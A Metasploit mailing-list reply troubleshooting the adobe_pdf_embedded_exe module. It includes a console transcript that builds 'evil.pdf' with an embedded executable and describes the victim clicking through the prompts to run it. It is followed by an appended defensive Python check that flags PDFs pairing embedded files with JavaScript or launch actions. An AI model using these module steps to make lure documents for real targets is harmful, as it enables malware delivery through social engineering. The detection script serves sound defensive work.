Metasploit mailing list archives

Re: windows/fileformat/adobe_pdf_embedded_exe no more working


From: Jonathan Cran <jcran () 0x0e org>
Date: Wed, 3 Mar 2010 02:19:03 -0500

On Wed, Mar 3, 2010 at 1:46 AM, Thomas Werth <security () vahle de> wrote:

minor corrections:

As it is "just javascript" (correct me if I'm wrong) that is executed,
it should run browser independent (I'm talking about executing custom
exe, not a payload). Or did I get something wrong here?

I wanted to write "viewer" independent. Don't know how "browser" made it
into this sentence :)

On 03.03.2010 07:36, Thomas Werth wrote:
Well, I'm sorry, this is not what I'm getting.

In the previous svn version it worked as described, even under Foxit Reader,
PDF-XChange Viewer and Acrobat Reader.

Latest Version claims (depending on viewer) about cmd.exe not found or
tries to execute *.pdf instead of *.exe

As it is "just javascript" (correct me if I'm wrong) that is executed,
it should run browser independent (I'm talking about executing custom
exe, not a payload). Or did I get something wrong here?


Thomas,

Without doing the background research *shame* I believe you're correct about
the application using "just javascript" to execute the internal payload, or
at least javascript-like functionality. However, each viewer has almost
certainly implemented that javascript engine within their own product
independently, and has just as likely modified that implementation (or
defaults) with all the controversy / problems around javascript+pdf.
However, it appears Adobe has not :) It's working okay here with:

* MS Windows XP Version 5.1.2600 Service Pack 3 Build 2600
* Adobe Reader 9.3.0
* Framework: 3.3.4-dev.8672
* Console  : 3.3.4-dev.8617
* Windows/Exec Payload (shouldn't matter)

* Exploit Transcript:

msf exploit(adobe_pdf_embedded_exe) > info

       Name: Adobe PDF Embedded EXE Social Engineering
    Version: 8380
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Colin Ames <amesc () attackresearch com>
  jduck <jduck () metasploit com>

Available targets:
  Id  Name
  --  ----
  0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  EXENAME     /tmp/calc.exe    no        The Name of payload exe.
  FILENAME    evil.pdf         no        The output filename.
  INFILENAME  /tmp/ms_eop.pdf  yes       The Input PDF filename.
  OUTPUTPATH  /tmp/            no        The location to output the file.

Payload information:
  Space: 2048

Description:
  This module embeds a Metasploit payload into an existing PDF file.
  The resulting PDF can be sent to a target as part of a social
  engineering attack.

msf exploit(adobe_pdf_embedded_exe) > exploit

[-] Exploit failed: The following options failed to validate: CMD.
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) > set CMD cmd.exe
CMD => cmd.exe
msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Reading in '/tmp/ms_eop.pdf'...
[*] Parsing '/tmp/ms_eop.pdf'...
[*] Parsing Successful.
[*] Using '/tmp/calc.exe' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file /tmp/evil.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >
msf exploit(adobe_pdf_embedded_exe) > version
Framework: 3.3.4-dev.8672
Console  : 3.3.4-dev.8617



PDF (evil.pdf) is then opened on target, and a prompt to save the file is
presented. PDF (ms_eop.pdf) is saved on the desktop, and a prompt to run the
internal executable is presented. Click 'okay' and calc.exe is presented.
Great success :)

http://www.metasploit.com/redmine/issues/959 updated.

Hope it helps

jcran

jcran () metasploit com
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
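
Added example, not part of the original message and not Metasploit code: a defender-side triage check for PDFs of the kind discussed in this thread (an embedded file combined with script or launch actions), which also decodes the #xx escapes that PDF names may use. The list of names and the block/review/pass thresholds are assumptions chosen for illustration, and both sample documents are constructed.

```python
import re
import sys

# PDF name tokens (from the PDF specification) worth flagging at a mail or web gateway.
RISK_NAMES = ("EmbeddedFile", "EmbeddedFiles", "JavaScript", "JS",
              "Launch", "OpenAction", "AA")

# A name is "/" followed by regular characters; whitespace and delimiters end it.
_NAME = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")

def decode_name(raw: bytes) -> str:
    """Undo #xx escapes, so /J#61vaScript is counted as /JavaScript."""
    return _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")

def count_names(data: bytes) -> dict:
    """Count risky names in the raw bytes. Names hidden inside compressed
    object streams are not seen; this is a first-pass filter only."""
    counts = dict.fromkeys(RISK_NAMES, 0)
    for m in _NAME.finditer(data):
        name = decode_name(m.group(1))
        if name in counts:
            counts[name] += 1
    return counts

def triage(data: bytes) -> str:
    """Return 'block', 'review' or 'pass' (thresholds are an assumption)."""
    c = count_names(data)
    embedded = c["EmbeddedFile"] or c["EmbeddedFiles"]
    active = c["JavaScript"] or c["JS"] or c["Launch"]
    if embedded and active:
        return "block"    # attachment plus code that can act on it
    if embedded or active or c["OpenAction"] or c["AA"]:
        return "review"
    return "pass"

# Constructed samples: structural keys only, no payload.
SAMPLE = (b"%PDF-1.4\n"
          b"1 0 obj << /Type /Catalog /Names << /EmbeddedFiles 2 0 R >> "
          b"/OpenAction 3 0 R >> endobj\n"
          b"3 0 obj << /S /J#61vaScript /JS (placeholder) >> endobj\n"
          b"4 0 obj << /Type /EmbeddedFile /Length 0 >> stream\nendstream endobj\n")
BENIGN = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, triage(fh.read()))
```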
